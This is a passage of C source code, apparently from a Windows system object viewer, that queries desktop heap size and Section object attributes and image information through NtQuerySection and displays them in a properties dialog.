LocalFree(StringSid);
}
//Add Desktop Heap Size, returned in KBytes
dwDesktopHeapSize = 0;
if (GetUserObjectInformation(hDesktop, UOI_HEAPSIZE,
&dwDesktopHeapSize, sizeof(dwDesktopHeapSize), &bytesNeeded)) {
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
ultostr(dwDesktopHeapSize / 1024, szBuffer);
_strcat(szBuffer, L" Mb");
lvitem.mask = LVIF_TEXT;
lvitem.iSubItem = 2;
lvitem.pszText = szBuffer;
lvitem.iItem = nIndex;
ListView_SetItem(DesktopList, &lvitem);
}
CloseDesktop(hDesktop);
}
return TRUE;
}
/*
* propBasicQuerySection
*
* Purpose:
*
* Set information values for Section object type
*
* If ExtendedInfoAvailable is FALSE then it calls propSetDefaultInfo to set Basic page properties
*
*/
VOID propBasicQuerySection(
_In_ PROP_OBJECT_INFO *Context,
_In_ HWND hwndDlg,
_In_ BOOL ExtendedInfoAvailable
)
{
BOOL bSet;
NTSTATUS status;
HANDLE hObject;
SIZE_T bytesNeeded;
LPWSTR lpType;
RECT rGB;
WCHAR szBuffer[MAX_PATH * 2];
SECTION_BASIC_INFORMATION sbi;
SECTION_IMAGE_INFORMATION sii;
SetDlgItemText(hwndDlg, ID_SECTION_ATTR, T_CannotQuery);
SetDlgItemText(hwndDlg, ID_SECTIONSIZE, T_CannotQuery);
if (Context == NULL) {
return;
}
//
// Open Section object.
//
hObject = NULL;
if (!propOpenCurrentObject(Context, &hObject, SECTION_QUERY)) {
return;
}
//this is for specific mars warning, mars doesn't recognize __stosb intrinsics
szBuffer[0] = 0;
//query basic information
RtlSecureZeroMemory(&sbi, sizeof(SECTION_BASIC_INFORMATION));
status = NtQuerySection(hObject, SectionBasicInformation, &sbi,
sizeof(SECTION_BASIC_INFORMATION), &bytesNeeded);
if (NT_SUCCESS(status)) {
bSet = FALSE;
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
if (sbi.AllocationAttributes & SEC_BASED) {
_strcat(szBuffer, TEXT("Based"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_NO_CHANGE) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("NoChange"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_FILE) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("File"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_IMAGE) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("Image"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_RESERVE) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("Reserve"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_COMMIT) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("Commit"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_NOCACHE) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("NoCache"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_GLOBAL) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("Global"));
bSet = TRUE;
}
if (sbi.AllocationAttributes & SEC_LARGE_PAGES) {
if (bSet) _strcat(szBuffer, TEXT(" + "));
_strcat(szBuffer, TEXT("LargePages"));
}
SetDlgItemText(hwndDlg, ID_SECTION_ATTR, szBuffer);
//Size
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, TEXT("0x%I64X"), sbi.MaximumSize.QuadPart);
SetDlgItemText(hwndDlg, ID_SECTIONSIZE, szBuffer);
//query image information
if ((sbi.AllocationAttributes & SEC_IMAGE) && (sbi.AllocationAttributes & SEC_FILE)) {
RtlSecureZeroMemory(&sii, sizeof(SECTION_IMAGE_INFORMATION));
status = NtQuerySection(hObject, SectionImageInformation, &sii,
sizeof(SECTION_IMAGE_INFORMATION), &bytesNeeded);
if (NT_SUCCESS(status)) {
//show hidden controls
if (GetWindowRect(GetDlgItem(hwndDlg, ID_IMAGEINFO), &rGB)) {
EnumChildWindows(hwndDlg, supEnumEnableChildWindows, (LPARAM)&rGB);
}
//Entry
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, TEXT("0x%I64X"), (ULONG_PTR)sii.TransferAddress);
SetDlgItemText(hwndDlg, ID_IMAGE_ENTRY, szBuffer);
//Stack Reserve
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, TEXT("0x%I64X"), sii.MaximumStackSize);
SetDlgItemText(hwndDlg, ID_IMAGE_STACKRESERVE, szBuffer);
//Stack Commit
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
wsprintf(szBuffer, TEXT("0x%I64X"), sii.CommittedStackSize);
SetDlgItemText(hwndDlg, ID_IMAGE_STACKCOMMIT, szBuffer);
//Executable
SetDlgItemText(hwndDlg, ID_IMAGE_EXECUTABLE,
(sii.ImageContainsCode) ? TEXT("Yes") : TEXT("No"));
//Subsystem
lpType = TEXT("Unknown");
switch (sii.SubSystemType) {
case IMAGE_SUBSYSTEM_NATIVE:
lpType = TEXT("Native");
break;
case IMAGE_SUBSYSTEM_WINDOWS_GUI:
lpType = TEXT("Windows GUI");
break;
case IMAGE_SUBSYSTEM_WINDOWS_CUI:
lpType = TEXT("Windows Console");
break;
case IMAGE_SUBSYSTEM_OS2_CUI:
lpType = TEXT("OS/2 Console");
break;
case IMAGE_SUBSYSTEM_POSIX_CUI:
lpType = TEXT("Posix Console");
break;
case IMAGE_SUBSYSTEM_XBOX:
lpType = TEXT("XBox");
break;
case IMAGE_SUBSYSTEM_EFI_APPLICATION:
lpType = TEXT("EFI Application");
break;
case IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER:
lpType = TEXT("EFI Boot Service Driver");
break;
case IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER:
lpType = TEXT("EFI Runtime Driver");
break;
case IMAGE_SUBSYSTEM_WINDOWS_BOOT_APPLICATION:
lpType = TEXT("Windows Boot Application");
break;
}
SetDlgItemText(hwndDlg, ID_IMAGE_SUBSYSTEM, lpType);
//Major Version
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
ultostr(sii.SubSystemMajorVersion, _strend(szBuffer));
SetDlgItemText(hwndDlg, ID_IMAGE_MJV, szBuffer);
//Minor Version
RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
ultostr(sii.SubSystemMinorVersion, _strend(szBuffer));
SetDlgItemText(hwndDlg, ID_IMAGE_MNV, szBuffer);
}
}
}
//
// Query object basic and type info if needed.
//
if (ExtendedInfoAvailable == FALSE) {
propSetDefaultInfo(Context, hwndDlg, hObject);
}
NtClose(hObject);
}
